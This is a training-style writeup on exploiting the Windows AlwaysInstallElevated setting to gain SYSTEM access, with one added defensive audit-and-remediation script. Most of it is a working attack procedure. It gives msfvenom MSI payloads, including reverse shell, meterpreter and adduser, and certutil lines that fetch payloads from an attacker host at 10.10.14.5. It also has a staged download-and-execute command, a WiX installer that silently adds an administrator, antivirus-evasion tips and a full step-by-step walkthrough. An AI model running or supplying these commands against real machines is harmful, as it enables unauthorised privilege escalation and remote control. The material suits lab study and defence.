AlwaysInstallElevated Exploitation

Intermediate | 25 min | Writeup

Exploiting AlwaysInstallElevated for SYSTEM

Learning Objectives

  • Check for AlwaysInstallElevated
  • Create malicious MSI
  • Execute MSI as SYSTEM
  • Generate payload with msfvenom

AlwaysInstallElevated is a Windows Group Policy setting that allows any user to install MSI packages with SYSTEM privileges. When enabled, it's an instant privilege escalation - just install a malicious MSI and get SYSTEM.

Think of it like a "VIP installation pass" that Windows gives to everyone. Normally, installing software requires admin rights. With AlwaysInstallElevated, even low-privileged users can run installers as SYSTEM. We just need to give Windows a "malicious installer".

Both Keys Required

AlwaysInstallElevated must be set to 1 in BOTH HKLM and HKCU registry locations. If only one is set, the vulnerability doesn't exist. Always check both.

Checking for AlwaysInstallElevated

batch
REM Check both registry locations

REM Local Machine policy
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

REM Current User policy
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

REM Both must return:
REM     AlwaysInstallElevated    REG_DWORD    0x1

REM If either returns "ERROR: The system was unable to find..."
REM then the vulnerability does NOT exist

REM Quick one-liner check
REM (the find "0x1" filter matters: reg query also succeeds when the value exists but is 0)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2>nul | find "0x1" >nul && reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2>nul | find "0x1" >nul && echo VULNERABLE!

PowerShell Check

powershell
# Check both keys
$HKLM = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
$HKCU = Get-ItemProperty -Path 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue

if ($HKLM.AlwaysInstallElevated -eq 1 -and $HKCU.AlwaysInstallElevated -eq 1) {
    Write-Host "VULNERABLE - AlwaysInstallElevated is enabled!" -ForegroundColor Red
} else {
    Write-Host "Not vulnerable" -ForegroundColor Green
}
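As an added example (not code from the original writeup), the same check written as a reusable audit plus a remediation step, the way a defender or hardening script would use it. Test-AlwaysInstallElevated and Disable-AlwaysInstallElevated are my own function names; the two hive paths are the keys discussed above.

```powershell
# Added example: audit both policy keys and, optionally, clear them.
# Function names are hypothetical; the registry paths are the real policy keys.
$Paths = @{
    HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Test-AlwaysInstallElevated {
    # One record per hive (Value is $null when the key or value is absent),
    # plus an overall flag that is true only when BOTH hives hold 1.
    $state = foreach ($hive in $Paths.Keys) {
        $item = Get-ItemProperty -Path $Paths[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Hive  = $hive
            Path  = $Paths[$hive]
            Value = $item.AlwaysInstallElevated   # $null if $item is $null
        }
    }
    $vulnerable = @($state | Where-Object { $_.Value -eq 1 }).Count -eq 2
    [pscustomobject]@{ Vulnerable = $vulnerable; Keys = $state }
}

function Disable-AlwaysInstallElevated {
    # Sets the value to 0 in every hive where the policy key exists.
    # Supports -WhatIf so the change can be previewed first.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($hive in $Paths.Keys) {
        $path = $Paths[$hive]
        if (-not (Test-Path $path)) { continue }   # nothing configured here
        if ($PSCmdlet.ShouldProcess($path, 'Set AlwaysInstallElevated = 0')) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

$result = Test-AlwaysInstallElevated
$result.Keys | Format-Table Hive, Value
if ($result.Vulnerable) {
    Write-Warning 'Both hives set to 1: any user can install MSI packages as SYSTEM.'
    Disable-AlwaysInstallElevated -WhatIf   # drop -WhatIf to apply (HKLM needs admin)
}
```

If the value is delivered by Group Policy, a local change is reverted at the next policy refresh; the lasting fix is setting "Always install with elevated privileges" to Disabled under both Computer Configuration and User Configuration.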

WinPEAS & PowerUp

batch
REM WinPEAS checks automatically
.\winpeas.exe

REM Look for:
REM [!] AlwaysInstallElevated is set to 1 in both HKLM and HKCU!

REM PowerUp check (run from PowerShell)
Import-Module .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated

REM Output:
REM HKLMValue: 1
REM HKCUValue: 1
REM AbuseFunction: Write-UserAddMSI

Exploitation

Method 1: msfvenom MSI

bash
# On attack machine, generate malicious MSI

# Add user (no callback required)
msfvenom -p windows/adduser USER=hacker PASS=Password123! -f msi -o evil.msi

# Reverse shell (requires listener)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o shell.msi

# Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o meterpreter.msi

# Transfer to target
python3 -m http.server 80
# On target:
certutil -urlcache -f http://10.10.14.5/evil.msi evil.msi

Method 2: Installing the MSI

batch
REM Install MSI (runs as SYSTEM!)

REM Quiet installation (no GUI)
msiexec /quiet /qn /i evil.msi

REM Options:
REM /quiet - No user interaction
REM /qn    - No UI at all
REM /i     - Install

REM After installation:
REM - If adduser payload: check net localgroup Administrators
REM - If reverse shell: check your listener

REM Example with adduser:
msiexec /quiet /qn /i C:\temp\evil.msi
net localgroup Administrators
REM Should show 'hacker' added

net user hacker
REM Shows user exists

REM Log in or use runas
runas /user:hacker cmd

Method 3: PowerUp Automation

powershell
# PowerUp can create and install MSI automatically
Import-Module .\PowerUp.ps1

# Create MSI that adds admin user
Write-UserAddMSI

# Creates UserAdd.msi in current directory
# Adds user: john / Password123!

# Install it
msiexec /quiet /qn /i UserAdd.msi

# Verify
net localgroup Administrators
# Should show 'john'

# Or use PowerUp's full automation
Invoke-AllChecks
# Shows AbuseFunction for exploitation

Creating Custom MSI

For more control, create an MSI with the WiX Toolset:

1. Install WiX Toolset
2. Create a .wxs file:

xml
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="GUID" Name="Evil" Version="1.0">
    <Package InstallerVersion="200" Compressed="yes"/>
    <MediaTemplate/>

    <CustomAction Id="RunCmd" Execute="deferred"
                  Impersonate="no"
                  Return="ignore"
                  Directory="TARGETDIR"
                  ExeCommand='cmd.exe /c net user hacker Password123! /add &amp;&amp; net localgroup Administrators hacker /add'/>

    <InstallExecuteSequence>
      <Custom Action="RunCmd" After="InstallFiles"/>
    </InstallExecuteSequence>

    <Directory Id="TARGETDIR" Name="SourceDir"/>
    <Feature Id="ProductFeature"/>
  </Product>
</Wix>

3. Compile:

batch
candle.exe evil.wxs
light.exe evil.wixobj -o evil.msi

Pre-built MSIs

For most cases, msfvenom is sufficient. Custom MSI creation is rarely needed but useful for AV evasion or specific payload requirements.

AV Evasion Considerations

bash
# msfvenom MSI payloads are often detected
# Options for evasion:

# 1. Use adduser (less flagged than shells)
msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123! -f msi -o adduser.msi

# 2. Use exec to run a benign-looking command
msfvenom -p windows/exec CMD="cmd /c net user hacker P@ssw0rd123! /add" -f msi -o exec.msi

# 3. Download and execute (two-stage)
msfvenom -p windows/exec CMD="certutil -urlcache -f http://10.10.14.5/shell.exe shell.exe && shell.exe" -f msi -o staged.msi

# 4. Encode/obfuscate the MSI
# Various tools exist, but beyond scope

# 5. Custom MSI with WiX (shown above)
# More control, fewer signatures

Complete Attack Example

batch
REM === AlwaysInstallElevated Attack Walkthrough ===

REM 1. Check for vulnerability
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
REM     AlwaysInstallElevated    REG_DWORD    0x1    <- GOOD!

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
REM     AlwaysInstallElevated    REG_DWORD    0x1    <- GOOD!

REM 2. Generate payload on attacker
REM msfvenom -p windows/adduser USER=pwned PASS=Pwned123! -f msi -o adduser.msi

REM 3. Transfer to target
certutil -urlcache -f http://10.10.14.5/adduser.msi C:\temp\adduser.msi

REM 4. Install (as SYSTEM)
msiexec /quiet /qn /i C:\temp\adduser.msi

REM 5. Verify new admin user
net localgroup Administrators
REM Administrators:
REM   Administrator
REM   pwned    <- Our new admin!

REM 6. Use the new credentials
runas /user:pwned cmd
REM Password: Pwned123!
REM Now running as local admin!

AlwaysInstallElevated Methodology

1. Check HKLM: reg query for AlwaysInstallElevated = 1
2. Check HKCU: reg query for AlwaysInstallElevated = 1
3. Generate MSI: msfvenom with adduser or shell payload
4. Transfer: upload MSI to target
5. Install: msiexec /quiet /qn /i evil.msi
6. Access: use new admin creds or catch shell

Knowledge Check


What two registry locations must have AlwaysInstallElevated set?

Challenges

Exploit AlwaysInstallElevated

Challenge (intermediate)

You've discovered AlwaysInstallElevated is enabled on a Windows target. Exploit it to gain administrator access.


Key Takeaways

  • AlwaysInstallElevated = install MSI packages as SYSTEM
  • Must be set in BOTH HKLM and HKCU registry locations
  • msfvenom generates MSI payloads easily
  • msiexec /quiet /qn /i installs silently
  • adduser payload avoids need for listener
  • PowerUp's Write-UserAddMSI automates exploitation